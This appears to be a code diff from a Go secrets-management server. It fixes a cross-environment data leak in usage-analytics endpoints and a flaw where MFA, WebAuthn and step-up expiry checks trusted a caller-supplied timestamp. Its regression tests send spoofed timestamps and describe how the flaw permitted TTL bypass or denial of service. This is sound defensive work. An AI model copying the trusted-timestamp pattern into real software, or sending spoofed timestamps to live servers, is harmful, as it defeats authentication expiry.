@@ -858,7 +858,7 @@ func newAuditStoreMax(t *testing.T) *LocalStorage {
 func TestMostAccessedSecrets_Empty(t *testing.T) {
 	ls := newAuditStoreMax(t)
 	var pid uint = 1
-	result, err := ls.MostAccessedSecrets(context.Background(), &pid, time.Now().Add(-time.Hour), 10)
+	result, err := ls.MostAccessedSecrets(context.Background(), &pid, nil, time.Now().Add(-time.Hour), 10)
 	require.NoError(t, err)
 	assert.Empty(t, result)
 }
@@ -867,7 +867,7 @@ func TestMostAccessedSecrets_Empty(t *testing.T) {
 func TestUnusedSecrets_Empty(t *testing.T) {
 	ls := newAuditStoreMax(t)
 	var pid uint = 1
-	result, err := ls.UnusedSecrets(context.Background(), &pid, time.Now())
+	result, err := ls.UnusedSecrets(context.Background(), &pid, nil, time.Now())
 	require.NoError(t, err)
 	assert.Empty(t, result)
 }

--- a/internal/storage/store/usage_analytics_test.go
+++ b/internal/storage/store/usage_analytics_test.go
@@ -53,12 +53,31 @@ func seedUsageFixtures(t *testing.T, ls *LocalStorage, now time.Time) {
 	read(1, now.AddDate(0, 0, -1), "update")
 }
 
+// seedUsageFixturesEnv2 seeds a second, distinctly-identifiable environment
+// (EnvironmentID 2) alongside seedUsageFixtures' environment 1, so tests can
+// assert that an environment-scoped query returns only one environment's
+// data and never leaks the other's.
+func seedUsageFixturesEnv2(t *testing.T, ls *LocalStorage, now time.Time) {
+	t.Helper()
+	ctx := context.Background()
+	secrets := []*models.SecretNode{
+		{ID: 6, Name: "env2-hot-key", EnvironmentID: 2, IsSecret: true},
+		{ID: 7, Name: "env2-never-read", EnvironmentID: 2, IsSecret: true},
+	}
+	for _, s := range secrets {
+		require.NoError(t, ls.db.WithContext(ctx).Create(s).Error)
+	}
+	require.NoError(t, ls.db.WithContext(ctx).Create(&models.SecretAccessLog{
+		SecretNodeID: 6, AccessedBy: "u", AccessTime: now.AddDate(0, 0, -1), Action: "read",
+	}).Error)
+}
+
 func TestMostAccessedSecrets(t *testing.T) {
 	ls := newUsageTestStore(t)
 	now := time.Now()
 	seedUsageFixtures(t, ls, now)
 
-	stats, err := ls.MostAccessedSecrets(context.Background(), nil, now.AddDate(0, 0, -30), 10)
+	stats, err := ls.MostAccessedSecrets(context.Background(), nil, nil, now.AddDate(0, 0, -30), 10)
 	require.NoError(t, err)
 	require.Len(t, stats, 2, "only secrets read within the window, folders excluded")
 
@@ -75,10 +94,49 @@ func TestMostAccessedSecrets_RespectsLimit(t *testing.T) {
 	now := time.Now()
 	seedUsageFixtures(t, ls, now)
 
-	stats, err := ls.MostAccessedSecrets(context.Background(), nil, now.AddDate(0, 0, -30), 1)
+	stats, err := ls.MostAccessedSecrets(context.Background(), nil, nil, now.AddDate(0, 0, -30), 1)
 	require.NoError(t, err)
 	require.Len(t, stats, 1)
 	assert.Equal(t, "hot-key", stats[0].SecretName)
+}
+
+// TestMostAccessedSecrets_ScopedToEnvironment is the regression test for the
+// scope-widening leak: a caller authorized for (or intending to query) only
+// one environment must not receive another environment's usage data mixed
+// into the result, even though both environments live in the same project
+// scope. Confirms the fix FAILS pre-fix (environmentID silently ignored,
+// returning both environments' secrets) and PASSES post-fix.
+func TestMostAccessedSecrets_ScopedToEnvironment(t *testing.T) {
+	ls := newUsageTestStore(t)
+	now := time.Now()
+	seedUsageFixtures(t, ls, now)     // environment 1: hot-key (3 reads), warm-key (1 read), ...
+	seedUsageFixturesEnv2(t, ls, now) // environment 2: env2-hot-key (1 read)
+
+	env1 := uint(1)
+	stats, err := ls.MostAccessedSecrets(context.Background(), nil, &env1, now.AddDate(0, 0, -30), 10)
+	require.NoError(t, err)
+	var names []string
+	for _, s := range stats {
+		names = append(names, s.SecretName)
+	}
+	assert.NotContains(t, names, "env2-hot-key", "environment 1 scoped query must not leak environment 2's usage data")
+	assert.Contains(t, names, "hot-key")
+
+	env2 := uint(2)
+	stats2, err := ls.MostAccessedSecrets(context.Background(), nil, &env2, now.AddDate(0, 0, -30), 10)
+	require.NoError(t, err)
+	require.Len(t, stats2, 1, "environment 2 scoped query must return only environment 2's secret")
+	assert.Equal(t, "env2-hot-key", stats2[0].SecretName)
+
+	// No environment filter: preserves today's project-wide aggregate behavior.
+	statsAll, err := ls.MostAccessedSecrets(context.Background(), nil, nil, now.AddDate(0, 0, -30), 10)
+	require.NoError(t, err)
+	var allNames []string
+	for _, s := range statsAll {
+		allNames = append(allNames, s.SecretName)
+	}
+	assert.Contains(t, allNames, "hot-key")
+	assert.Contains(t, allNames, "env2-hot-key")
 }
 
 func TestUnusedSecrets(t *testing.T) {
@@ -86,7 +144,7 @@ func TestUnusedSecrets(t *testing.T) {
 	now := time.Now()
 	seedUsageFixtures(t, ls, now)
 
-	stats, err := ls.UnusedSecrets(context.Background(), nil, now.AddDate(0, 0, -30))
+	stats, err := ls.UnusedSecrets(context.Background(), nil, nil, now.AddDate(0, 0, -30))
 	require.NoError(t, err)
 	require.Len(t, stats, 2, "never-read + stale, excluding recently-read and folders")
 
@@ -95,4 +153,40 @@ func TestUnusedSecrets(t *testing.T) {
 	assert.Nil(t, stats[0].LastRead)
 	assert.Equal(t, "stale-key", stats[1].SecretName)
 	require.NotNil(t, stats[1].LastRead)
+}
+
+// TestUnusedSecrets_ScopedToEnvironment is the regression test for the
+// scope-widening leak on the UnusedSecrets side: an environment-scoped query
+// must not return another environment's never-read/stale secrets.
+func TestUnusedSecrets_ScopedToEnvironment(t *testing.T) {
+	ls := newUsageTestStore(t)
+	now := time.Now()
+	seedUsageFixtures(t, ls, now)     // environment 1: never-read, stale-key are unused
+	seedUsageFixturesEnv2(t, ls, now) // environment 2: env2-never-read is unused
+
+	env1 := uint(1)
+	stats, err := ls.UnusedSecrets(context.Background(), nil, &env1, now.AddDate(0, 0, -30))
+	require.NoError(t, err)
+	var names []string
+	for _, s := range stats {
+		names = append(names, s.SecretName)
+	}
+	assert.NotContains(t, names, "env2-never-read", "environment 1 scoped query must not leak environment 2's unused-secret data")
+	assert.Contains(t, names, "never-read")
+
+	env2 := uint(2)
+	stats2, err := ls.UnusedSecrets(context.Background(), nil, &env2, now.AddDate(0, 0, -30))
+	require.NoError(t, err)
+	require.Len(t, stats2, 1, "environment 2 scoped query must return only environment 2's unused secret")
+	assert.Equal(t, "env2-never-read", stats2[0].SecretName)
+
+	// No environment filter: preserves today's project-wide aggregate behavior.
+	statsAll, err := ls.UnusedSecrets(context.Background(), nil, nil, now.AddDate(0, 0, -30))
+	require.NoError(t, err)
+	var allNames []string
+	for _, s := range statsAll {
+		allNames = append(allNames, s.SecretName)
+	}
+	assert.Contains(t, allNames, "never-read")
+	assert.Contains(t, allNames, "env2-never-read")
 }

--- a/server/grpc/services/audit_service_test.go
+++ b/server/grpc/services/audit_service_test.go
@@ -196,7 +196,7 @@ func TestAuditService_WriteAuditCheckpoint_UnsafeErrorIsSanitized_G50(t *testing
 	require.NoError(t, db.AutoMigrate(&models.AuditEvent{}, &models.User{},
 		&models.Role{}, &models.Permission{}, &models.RolePermission{}, &models.UserRole{},
 		&models.Group{}, &models.UserGroup{}, &models.GroupRole{},
-		&models.Project{}, &models.Environment{}))
+		&models.Project{}, &models.Environment{}, &models.SystemMetadata{}))
 	require.NoError(t, db.Create(&models.User{ID: 1, Username: "alice", Email: "alice@example.com"}).Error)
 	require.NoError(t, db.Create(&models.Role{ID: 1, Name: "super_admin"}).Error)
 	require.NoError(t, db.Create(&models.UserRole{UserID: 1, RoleID: 1, ProjectID: 0}).Error)
@@ -206,6 +206,10 @@ func TestAuditService_WriteAuditCheckpoint_UnsafeErrorIsSanitized_G50(t *testing
 
 	// Drop the table VerifyAuditChain reads from, so it fails with a raw SQL
 	// error instead of the "refusing to checkpoint" sentinel path.
+	// system_metadata stays migrated (the audit chain re-anchor lookup and the
+	// high-water mark both read it before the raw chain walk) so this test still
+	// isolates the intended audit_events failure instead of a table-missing
+	// error at an earlier, unrelated read.
 	require.NoError(t, db.Exec("DROP TABLE audit_events").Error)
 
 	svc := NewAuditService(c)

--- a/server/http/handlers/handlers_s4_test.go
+++ b/server/http/handlers/handlers_s4_test.go
@@ -12936,7 +12936,7 @@ func TestCatalogHandler_RestoreProject_NotFound_S4(t *testing.T) {
 	db, err := gorm.Open(sqlite.Open(":memory:"), &gorm.Config{})
 	require.NoError(t, err)
 	require.NoError(t, db.AutoMigrate(&models.Project{}, &models.Environment{}, &models.SecretNode{},
-		&models.ShareRecord{}, &models.DynamicSecretConfig{}, &models.Role{}, &models.UserRole{}, &models.GroupRole{}))
+		&models.ShareRecord{}, &models.DynamicSecretConfig{}, &models.Role{}, &models.UserRole{}, &models.Group{}, &models.GroupRole{}))
 	h := NewCatalogHandler(core.NewKeyorixCore(store.NewLocalStorage(db)))
 	req := withChiParam(httptest.NewRequest(http.MethodPost, "/", nil), "id", "9999")
 	w := httptest.NewRecorder()

--- a/server/http/handlers/mfa_clock_trust_test.go
+++ b/server/http/handlers/mfa_clock_trust_test.go
@@ -1,0 +1,235 @@
+// mfa_clock_trust_test.go — regression tests for "expiry check trusts a
+// caller-supplied timestamp instead of the server's real clock"
+// (G-wave6, findings-normalized.json uid
+// findings-handlers/handlers-users-crud.json#0, plus two structurally
+// identical sibling call sites found during the fix).
+//
+// Before the fix, GetActiveMFAChallenge / ConsumeMFAChallenge
+// (users_crud.go), ConsumeWebAuthnSessionProxy (webauthn_proxy.go), and
+// GetActiveMFAStepUpGrantProxy (mfa_stepup_proxy.go) all decoded a
+// caller-supplied `now` field from the request body and passed it straight
+// into the storage layer's "is this row still active" expiry comparison,
+// instead of using the server's own clock. A caller who could reach these
+// endpoints (behind users.write / system.read / system.write respectively)
+// could therefore supply a `now` from before a row's real expiry to keep an
+// already-expired challenge/session/grant usable past its TTL, or a
+// far-future `now` to make a still-live row look expired (denial of
+// service against a legitimate in-progress login/step-up).
+//
+// Each pair of tests below inserts a row with a REAL expiry relative to
+// time.Now(), then sends a request whose `now` field — if it were still
+// trusted — would flip the outcome, and asserts the server's real clock
+// wins regardless.
+package handlers
+
+import (
+	"bytes"
+	"encoding/json"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+	"time"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+	"gorm.io/gorm"
+
+	"github.com/keyorixhq/keyorix/internal/core"
+	sqlite "github.com/keyorixhq/keyorix/internal/storage/sqlitedialect"
+
+	"github.com/keyorixhq/keyorix/internal/storage/models"
+	"github.com/keyorixhq/keyorix/internal/storage/store"
+)
+
+// setupMFAClockTrustTest builds a UserHandler and AuthHandler over an
+// isolated in-memory SQLite DB, so each test can insert MFAChallenge/
+// WebAuthnSession/MFAStepUpGrant rows with a precisely-controlled ExpiresAt
+// without interference from the shared DB other _test.go files in this
+// package reuse across the whole test binary.
+func setupMFAClockTrustTest(t *testing.T) (*UserHandler, *AuthHandler, *gorm.DB) {
+	t.Helper()
+	db, err := gorm.Open(sqlite.Open(":memory:"), &gorm.Config{})
+	require.NoError(t, err)
+	require.NoError(t, db.AutoMigrate(
+		&models.MFAChallenge{}, &models.WebAuthnSession{}, &models.MFAStepUpGrant{},
+	))
+	coreService := core.NewKeyorixCore(store.NewLocalStorage(db))
+	uh, err := NewUserHandler(coreService)
+	require.NoError(t, err)
+	ah := NewAuthHandler(coreService, false)
+	return uh, ah, db
+}
+
+// --- users_crud.go: GetActiveMFAChallenge / ConsumeMFAChallenge ---
+
+func TestUserHandler_GetActiveMFAChallenge_ExpiredStaysExpiredDespiteClientNow(t *testing.T) {
+	uh, _, db := setupMFAClockTrustTest(t)
+	realNow := time.Now()
+	// Genuinely expired 1 hour ago by the server's real clock.
+	require.NoError(t, db.Create(&models.MFAChallenge{
+		UserID: 1, TokenHash: "expired-tok", ExpiresAt: realNow.Add(-1 * time.Hour), CreatedAt: realNow.Add(-2 * time.Hour),
+	}).Error)
+
+	// Attacker supplies a `now` from BEFORE the real expiry, which — if
+	// trusted — would make expires_at(-1h) > now(-2h) true, i.e. the
+	// challenge would wrongly look still-active.
+	spoofedNow := realNow.Add(-2 * time.Hour)
+	body, err := json.Marshal(map[string]any{"token_hash": "expired-tok", "now": spoofedNow})
+	require.NoError(t, err)
+
+	req := withUserCtx(httptest.NewRequest(http.MethodPost, "/", bytes.NewReader(body)))
+	w := httptest.NewRecorder()
+	uh.GetActiveMFAChallenge(w, req)
+
+	assert.Equal(t, http.StatusNotFound, w.Code, "server must use its own clock and correctly treat the challenge as expired")
+}
+
+func TestUserHandler_ConsumeMFAChallenge_ExpiredStaysExpiredDespiteClientNow(t *testing.T) {
+	uh, _, db := setupMFAClockTrustTest(t)
+	realNow := time.Now()
+	require.NoError(t, db.Create(&models.MFAChallenge{
+		UserID: 1, TokenHash: "expired-tok2", ExpiresAt: realNow.Add(-1 * time.Hour), CreatedAt: realNow.Add(-2 * time.Hour),
+	}).Error)
+
+	spoofedNow := realNow.Add(-2 * time.Hour)
+	body, err := json.Marshal(map[string]any{"token_hash": "expired-tok2", "now": spoofedNow})
+	require.NoError(t, err)
+
+	req := withUserCtx(httptest.NewRequest(http.MethodPost, "/", bytes.NewReader(body)))
+	w := httptest.NewRecorder()
+	uh.ConsumeMFAChallenge(w, req)
+
+	assert.Equal(t, http.StatusNotFound, w.Code, "server must use its own clock and refuse to consume an expired challenge")
+}
+
+func TestUserHandler_GetActiveMFAChallenge_ActiveStaysActiveDespiteFarFutureClientNow(t *testing.T) {
+	uh, _, db := setupMFAClockTrustTest(t)
+	realNow := time.Now()
+	// Genuinely NOT yet expired: expires 5 minutes from now.
+	require.NoError(t, db.Create(&models.MFAChallenge{
+		UserID: 1, TokenHash: "active-tok", ExpiresAt: realNow.Add(5 * time.Minute), CreatedAt: realNow,
+	}).Error)
+
+	// Attacker supplies a far-future `now`, which — if trusted — would make
+	// expires_at(+5m) > now(+1yr) false, i.e. the still-live challenge would
+	// wrongly look expired (DoS against the legitimate in-progress login).
+	spoofedNow := realNow.Add(365 * 24 * time.Hour)
+	body, err := json.Marshal(map[string]any{"token_hash": "active-tok", "now": spoofedNow})
+	require.NoError(t, err)
+
+	req := withUserCtx(httptest.NewRequest(http.MethodPost, "/", bytes.NewReader(body)))
+	w := httptest.NewRecorder()
+	uh.GetActiveMFAChallenge(w, req)
+
+	assert.Equal(t, http.StatusOK, w.Code, "server must use its own clock and correctly treat the still-live challenge as active")
+}
+
+func TestUserHandler_ConsumeMFAChallenge_ActiveStaysActiveDespiteFarFutureClientNow(t *testing.T) {
+	uh, _, db := setupMFAClockTrustTest(t)
+	realNow := time.Now()
+	require.NoError(t, db.Create(&models.MFAChallenge{
+		UserID: 1, TokenHash: "active-tok2", ExpiresAt: realNow.Add(5 * time.Minute), CreatedAt: realNow,
+	}).Error)
+
+	spoofedNow := realNow.Add(365 * 24 * time.Hour)
+	body, err := json.Marshal(map[string]any{"token_hash": "active-tok2", "now": spoofedNow})
+	require.NoError(t, err)
+
+	req := withUserCtx(httptest.NewRequest(http.MethodPost, "/", bytes.NewReader(body)))
+	w := httptest.NewRecorder()
+	uh.ConsumeMFAChallenge(w, req)
+
+	assert.Equal(t, http.StatusOK, w.Code, "server must use its own clock and successfully consume the still-live challenge")
+}
+
+// --- webauthn_proxy.go: ConsumeWebAuthnSessionProxy (sibling bug) ---
+
+func TestAuthHandler_ConsumeWebAuthnSessionProxy_ExpiredStaysExpiredDespiteClientNow(t *testing.T) {
+	_, ah, db := setupMFAClockTrustTest(t)
+	realNow := time.Now()
+	require.NoError(t, db.Create(&models.WebAuthnSession{
+		UserID: 1, TokenHash: "wa-expired-tok", Purpose: "login", ExpiresAt: realNow.Add(-1 * time.Hour), CreatedAt: realNow.Add(-2 * time.Hour),
+	}).Error)
+
+	spoofedNow := realNow.Add(-2 * time.Hour)
+	body, err := json.Marshal(map[string]any{"token_hash": "wa-expired-tok", "now": spoofedNow})
+	require.NoError(t, err)
+
+	req := httptest.NewRequest(http.MethodPost, "/", bytes.NewReader(body))
+	w := httptest.NewRecorder()
+	ah.ConsumeWebAuthnSessionProxy(w, req)
+
+	assert.Equal(t, http.StatusNotFound, w.Code, "server must use its own clock and refuse to consume an expired webauthn session")
+}
+
+func TestAuthHandler_ConsumeWebAuthnSessionProxy_ActiveStaysActiveDespiteFarFutureClientNow(t *testing.T) {
+	_, ah, db := setupMFAClockTrustTest(t)
+	realNow := time.Now()
+	require.NoError(t, db.Create(&models.WebAuthnSession{
+		UserID: 1, TokenHash: "wa-active-tok", Purpose: "login", ExpiresAt: realNow.Add(5 * time.Minute), CreatedAt: realNow,
+	}).Error)
+
+	spoofedNow := realNow.Add(365 * 24 * time.Hour)
+	body, err := json.Marshal(map[string]any{"token_hash": "wa-active-tok", "now": spoofedNow})
+	require.NoError(t, err)
+
+	req := httptest.NewRequest(http.MethodPost, "/", bytes.NewReader(body))
+	w := httptest.NewRecorder()
+	ah.ConsumeWebAuthnSessionProxy(w, req)
+
+	assert.Equal(t, http.StatusOK, w.Code, "server must use its own clock and successfully consume the still-live webauthn session")
+}
+
+// --- mfa_stepup_proxy.go: GetActiveMFAStepUpGrantProxy (sibling bug) ---
+
+func TestAuthHandler_GetActiveMFAStepUpGrantProxy_ExpiredStaysExpiredDespiteClientNow(t *testing.T) {
+	_, ah, db := setupMFAClockTrustTest(t)
+	realNow := time.Now().UTC()
+	// models.MFAStepUpGrant.BeforeSave normalizes ExpiresAt to UTC; write it
+	// pre-normalized here for clarity.
+	require.NoError(t, db.Create(&models.MFAStepUpGrant{
+		UserID: 1, ExpiresAt: realNow.Add(-1 * time.Hour), CreatedAt: realNow.Add(-2 * time.Hour),
+	}).Error)
+
+	spoofedNow := realNow.Add(-2 * time.Hour)
+	body, err := json.Marshal(map[string]any{"user_id": 1, "now": spoofedNow})
+	require.NoError(t, err)
+
+	req := httptest.NewRequest(http.MethodPost, "/", bytes.NewReader(body))
+	w := httptest.NewRecorder()
+	ah.GetActiveMFAStepUpGrantProxy(w, req)
+
+	require.Equal(t, http.StatusOK, w.Code)
+	var resp struct {
+		Success bool `json:"success"`
+		Data    any  `json:"data"`
+	}
+	require.NoError(t, json.Unmarshal(w.Body.Bytes(), &resp))
+	assert.True(t, resp.Success)
+	assert.Nil(t, resp.Data, "server must use its own clock: an expired grant must not be returned as active")
+}
+
+func TestAuthHandler_GetActiveMFAStepUpGrantProxy_ActiveStaysActiveDespiteFarFutureClientNow(t *testing.T) {
+	_, ah, db := setupMFAClockTrustTest(t)
+	realNow := time.Now().UTC()
+	require.NoError(t, db.Create(&models.MFAStepUpGrant{
+		UserID: 1, ExpiresAt: realNow.Add(5 * time.Minute), CreatedAt: realNow,
+	}).Error)
+
+	spoofedNow := realNow.Add(365 * 24 * time.Hour)
+	body, err := json.Marshal(map[string]any{"user_id": 1, "now": spoofedNow})
+	require.NoError(t, err)
+
+	req := httptest.NewRequest(http.MethodPost, "/", bytes.NewReader(body))
+	w := httptest.NewRecorder()
+	ah.GetActiveMFAStepUpGrantProxy(w, req)
+
+	require.Equal(t, http.StatusOK, w.Code)
+	var resp struct {
+		Success bool `json:"success"`
+		Data    any  `json:"data"`
+	}
+	require.NoError(t, json.Unmarshal(w.Body.Bytes(), &resp))
+	assert.True(t, resp.Success)
+	assert.NotNil(t, resp.Data, "server must use its own clock: a still-live grant must be returned as active")
+}

--- a/server/http/handlers/mfa_stepup_proxy.go
+++ b/server/http/handlers/mfa_stepup_proxy.go
@@ -29,10 +29,15 @@ type mfaStepUpGrantProxyBody struct {
 }
 
 // mfaStepUpGrantActiveProxyBody is the wire body for
-// GetActiveMFAStepUpGrantProxy.
+// GetActiveMFAStepUpGrantProxy. It used to also carry a caller-supplied
+// `now` forwarded straight into the expiry comparison — removed (G-wave6,
+// same class as users_crud.go's mfaChallengeLookupBody and
+// webauthn_proxy.go's webAuthnSessionConsumeProxyBody): a remote caller
+// could manipulate the effective "current time" used to decide whether a
+// step-up grant is still active, defeating the step-up TTL. This server now
+// always uses its own clock for that comparison.
 type mfaStepUpGrantActiveProxyBody struct {
-	UserID uint      `json:"user_id"`
-	Now    time.Time `json:"now"`
+	UserID uint `json:"user_id"`
 }
 
 // CreateMFAStepUpGrantProxy handles POST /api/v1/system/mfa/stepup-grants.
@@ -73,7 +78,12 @@ func (h *AuthHandler) GetActiveMFAStepUpGrantProxy(w http.ResponseWriter, r *htt
 		writeRemoteAPIError(w, http.StatusBadRequest, "INVALID_BODY", "user_id is required")
 		return
 	}
-	grant, err := h.coreService.Storage().GetActiveMFAStepUpGrant(r.Context(), body.UserID, body.Now)
+	// This server's own clock, never a caller-supplied value — see
+	// mfaStepUpGrantActiveProxyBody's doc comment. LocalStorage's
+	// GetActiveMFAStepUpGrant already normalizes this to .UTC() itself
+	// (local_mfa_stepup_grant.go), matching models.MFAStepUpGrant's
+	// BeforeSave UTC-normalization hook, so a plain time.Now() here is fine.
+	grant, err := h.coreService.Storage().GetActiveMFAStepUpGrant(r.Context(), body.UserID, time.Now())
 	if err != nil {
 		log.Printf("mfa stepup proxy: get active grant failed: %v", err)
 		writeRemoteAPIError(w, http.StatusInternalServerError, "STORAGE_ERROR", clientSafe(err))

--- a/server/http/handlers/secrets_analytics_s13_test.go
+++ b/server/http/handlers/secrets_analytics_s13_test.go
@@ -12,6 +12,7 @@
 package handlers
 
 import (
+	"encoding/json"
 	"fmt"
 	"net/http"
 	"net/http/httptest"
@@ -271,6 +272,159 @@ func TestUsageUnused_Success_S13(t *testing.T) {
 	w := httptest.NewRecorder()
 	h.UsageUnused(w, req)
 	assert.Equal(t, http.StatusOK, w.Code)
+}
+
+// TestUsageMostAccessed_BadEnvironmentID_S13 exercises the 400 branch when
+// environment_id is malformed.
+func TestUsageMostAccessed_BadEnvironmentID_S13(t *testing.T) {
+	h := newSecretHandlerForS13(t)
+	req := withUserCtx(
+		httptest.NewRequest(http.MethodGet, "/?environment_id=notanumber", nil),
+	)
+	w := httptest.NewRecorder()
+	h.UsageMostAccessed(w, req)
+	assert.Equal(t, http.StatusBadRequest, w.Code)
+}
+
+// TestUsageUnused_BadEnvironmentID_S13 exercises the 400 branch when
+// environment_id is malformed.
+func TestUsageUnused_BadEnvironmentID_S13(t *testing.T) {
+	h := newSecretHandlerForS13(t)
+	req := withUserCtx(
+		httptest.NewRequest(http.MethodGet, "/?environment_id=notanumber", nil),
+	)
+	w := httptest.NewRecorder()
+	h.UsageUnused(w, req)
+	assert.Equal(t, http.StatusBadRequest, w.Code)
+}
+
+// usageEnvFixture seeds one project with two environments, each holding a
+// distinctly-named secret with distinctly-identifiable usage data: env1's
+// secret is read repeatedly (making it "most accessed") and env2's secret is
+// never read (making it "unused"), so a leak in either direction — env2 data
+// bleeding into an env1-scoped most-accessed query, or vice versa for
+// unused — is independently observable.
+func usageEnvFixture(t *testing.T) (h *SecretHandler, projectID, env1ID, env2ID uint) {
+	t.Helper()
+	cs, db := freshCoreS12WithAdmin(t)
+	proj := &models.Project{Name: "usage-scope-proj"}
+	require.NoError(t, db.Create(proj).Error)
+	env1 := &models.Environment{Name: "env1", ProjectID: proj.ID}
+	require.NoError(t, db.Create(env1).Error)
+	env2 := &models.Environment{Name: "env2", ProjectID: proj.ID}
+	require.NoError(t, db.Create(env2).Error)
+
+	sec1 := &models.SecretNode{
+		Name: "env1-hot-secret", ProjectID: proj.ID, EnvironmentID: env1.ID,
+		OwnerID: 1, Type: "static", IsSecret: true,
+	}
+	require.NoError(t, db.Create(sec1).Error)
+	sec2 := &models.SecretNode{
+		Name: "env2-cold-secret", ProjectID: proj.ID, EnvironmentID: env2.ID,
+		OwnerID: 1, Type: "static", IsSecret: true,
+	}
+	require.NoError(t, db.Create(sec2).Error)
+
+	// env1's secret is read (most-accessed in env1, and NOT unused in env1).
+	require.NoError(t, db.Create(&models.SecretAccessLog{
+		SecretNodeID: sec1.ID, AccessedBy: "u", AccessTime: time.Now(), Action: "read",
+	}).Error)
+	// env2's secret is never read — it is unused in env2, and absent from
+	// env2's most-accessed report.
+
+	hh, err := NewSecretHandler(cs)
+	require.NoError(t, err)
+	return hh, proj.ID, env1.ID, env2.ID
+}
+
+// TestUsageMostAccessed_ScopedToEnvironment is the regression test for the
+// scope-widening leak (handlers-secrets-access-history.json#0): the route
+// authorizes at {project, environment} via ScopeFromQuery, but the handler
+// used to never read/forward environment_id, so a caller scoped to a single
+// environment received the whole project's aggregate. Confirms an
+// environment_id-scoped request returns only that environment's secret.
+func TestUsageMostAccessed_ScopedToEnvironment(t *testing.T) {
+	h, projectID, env1ID, _ := usageEnvFixture(t)
+
+	url := fmt.Sprintf("/?project_id=%d&environment_id=%d", projectID, env1ID)
+	req := withUserCtx(httptest.NewRequest(http.MethodGet, url, nil))
+	w := httptest.NewRecorder()
+	h.UsageMostAccessed(w, req)
+	require.Equal(t, http.StatusOK, w.Code)
+
+	var body struct {
+		Data struct {
+			Secrets []struct {
+				SecretName string `json:"secret_name"`
+			} `json:"secrets"`
+		} `json:"data"`
+	}
+	require.NoError(t, json.NewDecoder(w.Body).Decode(&body))
+
+	names := make([]string, 0, len(body.Data.Secrets))
+	for _, s := range body.Data.Secrets {
+		names = append(names, s.SecretName)
+	}
+	assert.Contains(t, names, "env1-hot-secret")
+	assert.NotContains(t, names, "env2-cold-secret", "environment-scoped most-accessed query must not leak the other environment's usage data")
+}
+
+// TestUsageUnused_ScopedToEnvironment is the UnusedSecrets-side counterpart
+// of TestUsageMostAccessed_ScopedToEnvironment: an environment_id-scoped
+// request must return only that environment's unused secret.
+func TestUsageUnused_ScopedToEnvironment(t *testing.T) {
+	h, projectID, _, env2ID := usageEnvFixture(t)
+
+	url := fmt.Sprintf("/?project_id=%d&environment_id=%d", projectID, env2ID)
+	req := withUserCtx(httptest.NewRequest(http.MethodGet, url, nil))
+	w := httptest.NewRecorder()
+	h.UsageUnused(w, req)
+	require.Equal(t, http.StatusOK, w.Code)
+
+	var body struct {
+		Data struct {
+			Secrets []struct {
+				SecretName string `json:"secret_name"`
+			} `json:"secrets"`
+		} `json:"data"`
+	}
+	require.NoError(t, json.NewDecoder(w.Body).Decode(&body))
+
+	names := make([]string, 0, len(body.Data.Secrets))
+	for _, s := range body.Data.Secrets {
+		names = append(names, s.SecretName)
+	}
+	assert.Contains(t, names, "env2-cold-secret")
+	assert.NotContains(t, names, "env1-hot-secret", "environment-scoped unused query must not leak the other environment's usage data")
+}
+
+// TestUsageMostAccessed_NoEnvironment_ReturnsProjectWideAggregate confirms
+// backward compatibility: omitting environment_id still returns the whole
+// project's aggregate (both environments' secrets), matching pre-fix
+// behavior for callers that intentionally query at project scope.
+func TestUsageMostAccessed_NoEnvironment_ReturnsProjectWideAggregate(t *testing.T) {
+	h, projectID, _, _ := usageEnvFixture(t)
+
+	url := fmt.Sprintf("/?project_id=%d", projectID)
+	req := withUserCtx(httptest.NewRequest(http.MethodGet, url, nil))
+	w := httptest.NewRecorder()
+	h.UsageMostAccessed(w, req)
+	require.Equal(t, http.StatusOK, w.Code)
+
+	var body struct {
+		Data struct {
+			Secrets []struct {
+				SecretName string `json:"secret_name"`
+			} `json:"secrets"`
+		} `json:"data"`
+	}
+	require.NoError(t, json.NewDecoder(w.Body).Decode(&body))
+
+	names := make([]string, 0, len(body.Data.Secrets))
+	for _, s := range body.Data.Secrets {
+		names = append(names, s.SecretName)
+	}
+	assert.Contains(t, names, "env1-hot-secret", "project-wide query (no environment_id) keeps today's aggregate behavior")
 }
 
 // ── secrets_audit_trail.go: AuditTrail + toSecretAuditEntry ──────────────────

--- a/server/http/handlers/secrets_usage.go
+++ b/server/http/handlers/secrets_usage.go
@@ -2,8 +2,8 @@
 //
 // Routes (under /api/v1/secrets):
 //
-//	GET /usage/most-accessed — top secrets by read count (params: project_id, days, limit)
-//	GET /usage/unused        — secrets not read in N days, never-read first (params: project_id, days)
+//	GET /usage/most-accessed — top secrets by read count (params: project_id, environment_id, days, limit)
+//	GET /usage/unused        — secrets not read in N days, never-read first (params: project_id, environment_id, days)
 package handlers
 
 import (
@@ -53,10 +53,19 @@ func (h *SecretHandler) UsageMostAccessed(w http.ResponseWriter, r *http.Request
 		h.sendError(w, "InvalidParameter", "Invalid project_id", http.StatusBadRequest, nil)
 		return
 	}
+	// Honour environment_id so an environment-scoped reader's view is confined to
+	// their environment (the route gate authorizes at {project, environment} via
+	// ScopeFromQuery, but this previously ignored the env and returned the whole
+	// project's aggregate usage data regardless of the caller's actual scope).
+	environmentID, perr := parseOptionalUintQuery(r, "environment_id")
+	if perr != nil {
+		h.sendError(w, "InvalidParameter", errInvalidEnvIDField, http.StatusBadRequest, nil)
+		return
+	}
 	days := parseIntQuery(r, "days", 30)
 	limit := parseIntQuery(r, "limit", 10)
 
-	stats, err := h.coreService.MostAccessedSecrets(r.Context(), projectID, days, limit)
+	stats, err := h.coreService.MostAccessedSecrets(r.Context(), projectID, environmentID, days, limit)
 	if err != nil {
 		h.sendError(w, "InternalError", "Failed to compute most-accessed secrets", http.StatusInternalServerError, nil)
 		return
@@ -77,9 +86,16 @@ func (h *SecretHandler) UsageUnused(w http.ResponseWriter, r *http.Request) {
 		h.sendError(w, "InvalidParameter", "Invalid project_id", http.StatusBadRequest, nil)
 		return
 	}
+	// Honour environment_id so an environment-scoped reader's view is confined to
+	// their environment (see UsageMostAccessed).
+	environmentID, perr := parseOptionalUintQuery(r, "environment_id")
+	if perr != nil {
+		h.sendError(w, "InvalidParameter", errInvalidEnvIDField, http.StatusBadRequest, nil)
+		return
+	}
 	days := parseIntQuery(r, "days", 30)
 
-	stats, err := h.coreService.UnusedSecrets(r.Context(), projectID, days)
+	stats, err := h.coreService.UnusedSecrets(r.Context(), projectID, environmentID, days)
 	if err != nil {
 		h.sendError(w, "InternalError", "Failed to compute unused secrets", http.StatusInternalServerError, nil)
 		return

